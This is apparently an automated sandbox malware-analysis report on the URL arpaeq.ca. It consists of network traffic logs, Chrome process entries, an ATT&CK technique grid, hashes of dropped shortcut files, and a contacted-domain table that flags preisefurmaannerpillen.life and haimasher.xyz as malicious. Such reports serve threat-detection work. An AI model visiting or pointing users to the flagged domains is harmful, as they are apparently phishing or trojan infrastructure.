Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.18:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.18:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49847 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49926 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.18:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.227.215:443 -> 192.168.2.18:49931 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.troj.win@19/75@21/252
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2004,i,6044703814408051465,12207852372008432556,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://arpaeq.ca"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2004,i,6044703814408051465,12207852372008432556,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://arpaeq.ca0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://arpaeq.ca/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    netdna.bootstrapcdn.com
    104.18.10.207
    truefalse
      high
      islonline.org
      23.23.49.179
      truefalse
        unknown
        arpaeq.ca
        188.114.96.3
        truefalse
          unknown
          www.google.com
          142.250.185.68
          truefalse
            high
            preisefurmaannerpillen.life
            79.141.161.48
            truetrue
              unknown
              haimasher.xyz
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://arpaeq.ca/false
                  unknown
                  http://arpaeq.ca/false
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  142.250.185.78
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.185.68
                  www.google.comUnited States
                  15169GOOGLEUSfalse
                  142.250.185.206
                  unknownUnited States
                  15169GOOGLEUSfalse
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUStrue
                  104.18.10.207
                  netdna.bootstrapcdn.comUnited States
                  13335CLOUDFLARENETUSfalse
                  216.58.212.142
                  unknownUnited States
                  15169GOOGLEUSfalse
                  23.23.49.179
                  islonline.orgUnited States
                  14618AMAZON-AESUSfalse
                  142.250.185.227
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.185.106
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.185.202
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.181.232
                  unknownUnited States
                  15169GOOGLEUSfalse
                  239.255.255.250
                  unknownReserved
                  unknownunknownfalse
                  188.114.97.3
                  unknownEuropean Union
                  13335CLOUDFLARENETUSfalse
                  79.141.161.48
                  preisefurmaannerpillen.lifeBulgaria
                  202015HZ-US-ASBGtrue
                  188.114.96.3
                  arpaeq.caEuropean Union
                  13335CLOUDFLARENETUSfalse
                  142.250.186.131
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.186.110
                  unknownUnited States
                  15169GOOGLEUSfalse
                  35.190.80.1
                  a.nel.cloudflare.comUnited States
                  15169GOOGLEUSfalse
                  142.250.184.200
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.186.99
                  unknownUnited States
                  15169GOOGLEUSfalse
                  66.102.1.84
                  unknownUnited States
                  15169GOOGLEUSfalse
                  216.58.212.170
                  unknownUnited States
                  15169GOOGLEUSfalse
                  IP
                  192.168.2.18
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1587504
                  Start date and time:2025-01-10 13:38:18 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:http://arpaeq.ca
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal56.phis.troj.win@19/75@21/252
                  • Exclude process from analysis (whitelisted): svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.185.206, 66.102.1.84, 142.250.186.142, 172.217.18.110, 216.58.206.78
                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: http://arpaeq.ca
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:38:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2675
                  Entropy (8bit):3.974886410004511
                  Encrypted:false
                  SSDEEP:
                  MD5:4E3A7850757DF0BF438EAA1626B08D44
                  SHA1:9E4C74DB8B382ECCBE92B92D6F5C9E69EADF7896
                  SHA-256:E85A0FD12EF6DDBAACC54E9347071CC44EBF17F89A87AA385D4BDC0EF5A2AB1B
                  SHA-512:FC03DA8108A92F9FAD05AB68EE2796432CD10831337737BA2C9FBE6D4BF2F336BE14BD668FAD827EDB862B5B1B23CB21E4E2414955979B8ABBB6D7EA5430D414
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,......n.\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I*Z.d....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.d....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V*Z.d....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V*Z.d...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z.d.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............x.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:38:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):3.988110405222821
                  Encrypted:false
                  SSDEEP:
                  MD5:A8A0C724810DC6FBBEA7F340A17A7BB4
                  SHA1:6E3C677830AA5052D92C666514922BBB07777CED
                  SHA-256:EC2FEB0C4583A650BBA19CC303670A6F4E42E6D70EDABF44F12351BEDD755031
                  SHA-512:7D0CD4379C1BF07050023699AB624F80A9319005AE5FED2669185C6B93E5E81DD0CB32CECAA0FF9C3F0E3C416B0166F8F0ECE5A0A2E301BD649F6E17318973AF
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,....6hO.\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I*Z.d....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.d....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V*Z.d....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V*Z.d...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z.d.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............x.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2691
                  Entropy (8bit):4.0033527716962025
                  Encrypted:false
                  SSDEEP:
                  MD5:0F58DB8CDAFCE2F85CB57A50F09A9D65
                  SHA1:2C28D8FC6F992CF92E09BC5844BAC845FB1EBB04
                  SHA-256:6D74538DBD9BC19EFF49F1C9A273DB6E2CFFEDB8EFBF1F037675302C10F9A80E
                  SHA-512:A3CD6ED07B7A0B97A5BF13F718F9FBCF051AD02B4C39B5518082B0D41BD841DAB448AC927347D971160481BED5D6E4CAA9B157DDE6E542BFF272BB0648436FA2
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I*Z.d....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.d....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V*Z.d....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V*Z.d...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............x.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:38:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2679
                  Entropy (8bit):3.9886675446831297
                  Encrypted:false
                  SSDEEP:
                  MD5:78FF1857607BEA0EF7FB4B0FAC3B9481
                  SHA1:FD07323CE43C69B6517957CE3890B3B2F9B354B1
                  SHA-256:6758A3E1BBCDEAAC34DE4DA184860C622F809211112843966CA30261E0BC7C98
                  SHA-512:0A7E1E39D02B5CEBB6550189A9FA977825120E2E006457736288A95EBFDFB4C58FECB92BD02BC917666EDEF4E082A04699672735A7BE455203609EA48BD3F8E9
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....&I.\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I*Z.d....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.d....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V*Z.d....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V*Z.d...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z.d.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............x.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:38:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2679
                  Entropy (8bit):3.9729131711793846
                  Encrypted:false
                  SSDEEP:
                  MD5:D2829DC138405FA9FE83404C3180B084
                  SHA1:5986630F5E6EA96C4A478BEE3BBFB706BCE27920
                  SHA-256:67E791D364B5CE869EA334D136E2FA2A4B6BADFC895942A6E0CC82E5B1B75A22
                  SHA-512:45B3519153CFD5512DFA40DC0F4B067C73621456DE09DEDBFDFE271C93230BE09744084C9C742E640A47361A01438E6684E11C0C38AF53D68D0DB2A3BE8A9D57
                  Malicious:false
                  Reputation:unknown
